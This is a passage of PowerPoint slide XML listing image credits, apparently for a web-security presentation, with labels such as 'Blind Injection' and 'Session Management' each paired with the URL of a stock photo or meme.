                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Identify, Exploit: </a:t>
            </a:r>
            <a:r>
              <a:t>http://s3.amazonaws.com/digitaltrends-uploads-prod/2016/02/hacker-keyboard-dark-room.jpg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2029">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Warning: </a:t>
            </a:r>
            <a:r>
              <a:t>https://i.gaw.to/photos/3/1/0/310203_Votre_conduite_est-elle_un_peu_rouillee.jpg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2029">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Futurama Characters (Multiple): </a:t>
            </a:r>
            <a:r>
              <a:t>http://pngimg.com/imgs/heroes/futurama/index.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2029">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Trust:</a:t>
            </a:r>
            <a:r>
              <a:t> https://www.gsb.stanford.edu/sites/gsb/files/photo-is-peterson-trust-0616.jpg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2029">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Hackday: </a:t>
            </a:r>
            <a:r>
              <a:t>http://santaknowsbest.ca/seller-tips/renovation-mistakes/attachment/duct-tape-fixes-everything/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2029">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Story Time:</a:t>
            </a:r>
            <a:r>
              <a:t> https://www.laconialibrary.org/ImageRepository/Document?documentID=1206</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2029">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Old Computer:</a:t>
            </a:r>
            <a:r>
              <a:t> https://www.dailydot.com/wp-content/uploads/b8e/54/e0b23b40a24e3f20208dbefd48cd0219.jpg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2029">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>SQL License Plate: </a:t>
            </a:r>
            <a:r>
              <a:t>http://i.imgur.com/1EHtAqv.jpg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2029">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Shocked: </a:t>
            </a:r>
            <a:r>
              <a:t>https://pre00.deviantart.net/9b76/th/pre/i/2012/191/9/0/scootaloo_shocked_vector_by_sparklepeep-d56j3au.png</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2029">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Blind Injection:</a:t>
            </a:r>
            <a:r>
              <a:t> http://radiuminteractive.com/wp-content/uploads/2013/05/blinds2.png</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2029">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>True/False:</a:t>
            </a:r>
            <a:r>
              <a:t> http://www.drchrisstephens.com/wp-content/uploads/2010/12/True-and-False-Sign1.jpg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2029">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Stopwatch:</a:t>
            </a:r>
            <a:r>
              <a:t> https://static.ybox.vn/2015/08/04d49454bf05ee901b29e83f096200f8.gif</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2029">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Salting: </a:t>
            </a:r>
            <a:r>
              <a:t>https://images-na.ssl-images-amazon.com/images/I/71VNlbjBHAL._UL1500_.jpg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2029">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Salt Yay: </a:t>
            </a:r>
            <a:r>
              <a:t>https://vignette.wikia.nocookie.net/battlefordreamislandfanfiction/images/b/b0/Salt_Pose.png</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2029">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Public:</a:t>
            </a:r>
            <a:r>
              <a:t> http://s.quickmeme.com/img/c7/c7b0527c59661d02e9e7a7fe8c1fd7dba1a78938afb092eb05e3793ef41d6374.jpg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2029">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Pepper Dance:</a:t>
            </a:r>
            <a:r>
              <a:t> http://rs165.pbsrc.com/albums/u55/BJ_BOBBI_JO9/Food%20and%20eating%20related/chilli.gif~c200</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2029">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>The Flash: </a:t>
            </a:r>
            <a:r>
              <a:t>http://www.dccomics.com/sites/default/files/GalleryComics_1920x1080_20161116_FLS_Cv1_581a5ebe389aa2.84758245.jpg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2029">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Borg:</a:t>
            </a:r>
            <a:r>
              <a:t> http://movies.trekcore.com/gallery/albums/firstcontacthd/firstcontacthd0183.jpg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2029">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Graph:</a:t>
            </a:r>
            <a:r>
              <a:t> https://d2v9y0dukr6mq2.cloudfront.net/video/thumbnail/SImAn91gin31gtxk/stock-market-fluctuations-graph-on-screen-indexes-going-up-and-down-statistics-electronic-chart-with-stock-market-fluctuations_h6zdiquyx_thumbnail-full12.png</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2029">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Egg Message:</a:t>
            </a:r>
            <a:r>
              <a:t> https://cdn.instructables.com/FRV/6XAQ/HU8P1PBT/FRV6XAQHU8P1PBT.LARGE.jpg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2029">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Encryption:</a:t>
            </a:r>
            <a:r>
              <a:t> https://cloudhesive.com/wp-content/uploads/2016/03/Encrypting-Data.jpg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2029">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Tank: </a:t>
            </a:r>
            <a:r>
              <a:t>http://i.huffpost.com/gen/1525655/thumbs/o-ARMOURED-VEHICLE-facebook.jpg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2029">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Bank Vault: </a:t>
            </a:r>
            <a:r>
              <a:t>https://images-na.ssl-images-amazon.com/images/I/717f5l8KtjL._SL1024_.jpg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2029">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Thinking Monkey:</a:t>
            </a:r>
            <a:r>
              <a:t> https://www.walldevil.com/wallpapers/a58/wallpaper-scratchi-desktop-monkey-sstorage-puzzled-image.jpg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2029">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Base64 Password:</a:t>
            </a:r>
            <a:r>
              <a:t> https://paragonie.com/blog/2015/08/you-wouldnt-base64-a-password-cryptography-decoded</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2029">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Top Secret: </a:t>
            </a:r>
            <a:r>
              <a:t>http://www.abetterinterview.com/wp-content/uploads/2013/02/Interview-Secrets.jpg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2029">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Homer:</a:t>
            </a:r>
            <a:r>
              <a:t> http://pngimg.com/uploads/simpsons/simpsons_PNG3.png</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2029">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Hack the Planet: </a:t>
            </a:r>
            <a:r>
              <a:t>https://i.imgur.com/xjtVvON.jpg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2029">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Dangerous: </a:t>
            </a:r>
            <a:r>
              <a:t>http://gulf-insider-i35ch33zpu3sxik.stackpathdns.com/wp-content/uploads/2018/04/image.jpg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2029">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Cookie Monster: </a:t>
            </a:r>
            <a:r>
              <a:t>http://gclipart.com/wp-content/uploads/2017/03/Cookie-monster-clip-art-7-2.png</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2029">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Clean hands:</a:t>
            </a:r>
            <a:r>
              <a:t> http://www.lakeunionrotary.org/wp-content/uploads/2013/03/110425_65573_Nepal_Gavin_Gough-1.jpg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2029">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Enigma:</a:t>
            </a:r>
            <a:r>
              <a:t> https://www.japantimes.co.jp/wp-content/uploads/2017/07/f-enigma-a-20170712.jpg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2029">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Glasses: </a:t>
            </a:r>
            <a:r>
              <a:t>http://hansengroupcompany.com/wp-content/uploads/2015/08/Fake-Prospect-1.png</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2029">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Fry Not Sure If: </a:t>
            </a:r>
            <a:r>
              <a:t>http://i0.kym-cdn.com/entries/icons/original/000/006/026/NOTSUREIF.jpg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2029">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Hacker: </a:t>
            </a:r>
            <a:r>
              <a:t>https://hips.hearstapps.com/pop.h-cdn.co/assets/15/45/1600x1066/gallery-1446570700-hacker.jpg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2029">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Fry Panic: </a:t>
            </a:r>
            <a:r>
              <a:t>https://alice961994.files.wordpress.com/2014/11/futurama-fry-stress.png</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2029">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Car Jack:</a:t>
            </a:r>
            <a:r>
              <a:t> https://www.kupplung.at/out/pictures/generated/product/1/640_640_90/1600x1600___z0100912_1600x1600_v1.png</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2029">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Account Enumeration: </a:t>
            </a:r>
            <a:r>
              <a:t>https://lans-soapbox.com/wp-content/uploads/2012/08/to-do-list-cartoon.png</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2029">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>LEGO Heads:</a:t>
            </a:r>
            <a:r>
              <a:t> https://unsplash.com/photos/7Z03R1wOdmI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2029">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Session Management: </a:t>
            </a:r>
            <a:r>
              <a:t>https://www3.nd.edu/~cone/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2029">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Lego Stormtroopers:</a:t>
            </a:r>
            <a:r>
              <a:t> http://mediataskforce.de/wp-content/uploads/2014/05/5331336772_b43071390b_o.jpg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2029">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Cookie:</a:t>
            </a:r>
            <a:r>
              <a:t> https://www.kickstarter.com/projects/1375547326/big-cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2029">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Hijacking: </a:t>
            </a:r>
            <a:r>
              <a:t>https://i.ytimg.com/vi/33goUjp0i9A/maxresdefault.jpg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2029">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>911 Phone: </a:t>
            </a:r>
            <a:r>
              <a:t>https://i.reddituploads.com/e48a14059ad147f1a2d4c43d55e6fca4?fit=max&amp;h=1536&amp;w=1536&amp;s=d2ce5485396fc269c39599e7e709a86f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2029">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Bike Rack: </a:t>
            </a:r>
            <a:r>
              <a:t>https://i.imgur.com/5szQOCm.jpg </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2029">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Car Plate:</a:t>
            </a:r>
            <a:r>
              <a:t> https://i.imgur.com/PhbIrcj.jpg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2029">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Traffic Lights:</a:t>
            </a:r>
            <a:r>
              <a:t> http://blog.pdus2go.com/blog-2/is-your-project-manager-traffic-light-broken/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2029">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Spiderman:</a:t>
            </a:r>
            <a:r>
              <a:t> https://orig00.deviantart.net/abc9/f/2016/348/b/9/spider_man___promotional_stock_art__2005_2012__by_figyalova-darngn6.png</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2029">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Too Much Power: </a:t>
            </a:r>
            <a:r>
              <a:t>https://i.imgur.com/WVNevwZ.png</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2029">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Borat: </a:t>
            </a:r>
            <a:r>
              <a:t>http://yourbrandlive.com/assets//images/blog/great_success_brandlive.png</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2029">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Overflow: </a:t>
            </a:r>
            <a:r>
